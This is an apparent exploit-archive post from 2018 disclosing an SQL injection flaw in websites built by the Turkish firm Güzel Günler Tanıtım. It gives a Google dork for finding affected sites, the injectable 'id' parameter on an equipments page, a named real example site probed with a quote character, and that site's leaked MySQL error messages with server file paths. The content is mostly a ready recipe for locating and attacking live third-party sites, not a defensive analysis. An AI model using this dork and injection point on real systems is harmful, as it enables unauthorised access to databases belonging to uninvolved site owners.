facebook facebook twitter rss

Tasarım Güzel Günler Tanıtım Web Design SQL Injection

Author: KingSkrupellos , Published: 08-10-2018
# Exploit Title : Tasarım Güzel Günler Tanıtım Web Design SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 06/10/2018
# Vendor Homepage : guzelgunler.com.tr
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

#################################################################################################

# Google Dork :

intext:''Tasarım: Güzel Günler Tanıtım''

# SQL Injection Exploit :

/equipments?id=[SQL Injection]

#################################################################################################

# Example Vulnerable Site =>

waggonltd.com/equipments?id=10%27 => [ Proof of Concept ] => archive.is/Z9N7v

# SQL Database Error =>

Deprecated: mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or
PDO instead in /home/waggonltd/domains/waggonltd.com/public_html/inc/config.php on line 9

Warning: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version
for the right syntax to use near ''' at line 1 in /home/waggonltd/domains/waggonltd.com/
public_html/inc/lib/db/mysqli/ez_sql_mysqli.php on line 266

Notice: Trying to get property of non-object in /home/waggonltd/domains/waggonltd.com/
public_html/theme/tema/hizmetler.php on line 18
Warning: You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near '' order by id desc' at line 1 in
/home/waggonltd/domains/waggonltd.com/public_html/inc/lib/db/mysqli/ez_sql_mysqli.php on line 266

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

Like us on Facebook :